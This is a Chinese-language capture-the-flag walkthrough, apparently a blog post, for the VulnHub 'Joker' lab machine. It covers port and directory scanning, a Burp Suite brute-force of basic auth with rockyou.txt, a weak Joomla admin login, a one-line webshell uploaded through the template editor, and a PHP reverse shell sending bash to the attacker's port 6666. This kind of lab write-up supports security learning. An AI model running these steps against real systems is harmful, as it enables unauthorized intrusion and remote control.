VulnHub-Joker通关攻略

一、信息收集

第一步:确定靶机IP为192.168.0.106

第二步:扫描后台及开放端口

#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
8080 --- Internet 信息服务
第三步:进行敏感目录及文件扫描

DIRECTORY:http://192.168.0.106/css/
DIRECTORY:http://192.168.0.106/img/
http://192.168.0.106/index.html(CODE:200ISIZE:5954)
http://192.168.0.106/phpinfo.php(CODE:200ISIZE:94857)
http://192.168.0.106/server-status(CODE:403ISIZE:278)
第四步:进一步进行dirb扫描,发现secret.txt

第五步:访问8080端口,出现登录框

二、网站爆破

第一步:在secret.txt中多次出现rock,猜测指的是kali中自带的rockyou.txt字典,着手尝试bp抓包,爆破登录8080端口网站

#从互联网上手动下载 rockyou.txt
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

#下载完成后,将文件移动到 /usr/share/wordlists/ 目录下
sudo mv rockyou.txt /usr/share/wordlists/

#验证文件是否真的存在于指定位置
ls /usr/share/wordlists/rockyou.txt
第二步:生成字典

head -n 100 /usr/share/wordlists/rockyou.txt > test.txt
//从字典文件 /usr/share/wordlists/rockyou.txt 中提取前 100 行内容,并将这些内容重定向输出到一个名为 test.txt 的新文件里。如果 test.txt 文件不存在,该命令会创建此文件;若文件已存在,则会覆盖原文件内容
第三步:抓包,对basic后面的字符串进行解码,得到账号密码格式为“用户名:密码”

第四步:发送到攻击模块,添加payload,将前面生成的字典test.txt移动至物理机,导入

第五步:添加前缀、添加64位编码、取消勾选url编码字符

第六步:开始攻击,进行64位解码,得到账号密码joker:hannah

第七步:登录成功,同时发现该站点使用了joomlaCMS

第八步:尝试弱口令登录,多次尝试有发现此处用户名和密码均为joomla,登录成为Super User

第九步:在用户菜单点击Site Administrator,登陆后台

三、Getshell

第一步:在插件下的模板处发现漏洞,上传一句话木马

第二步:使用蚁剑进行连接,连接成功

第三步:反弹shell,新建fandanshell.php,写入代码,将shell反弹至Kali的6666端口

#fandanshell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/6666 0>&1'");?>

                                                                                                                                FROM  IYU_

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值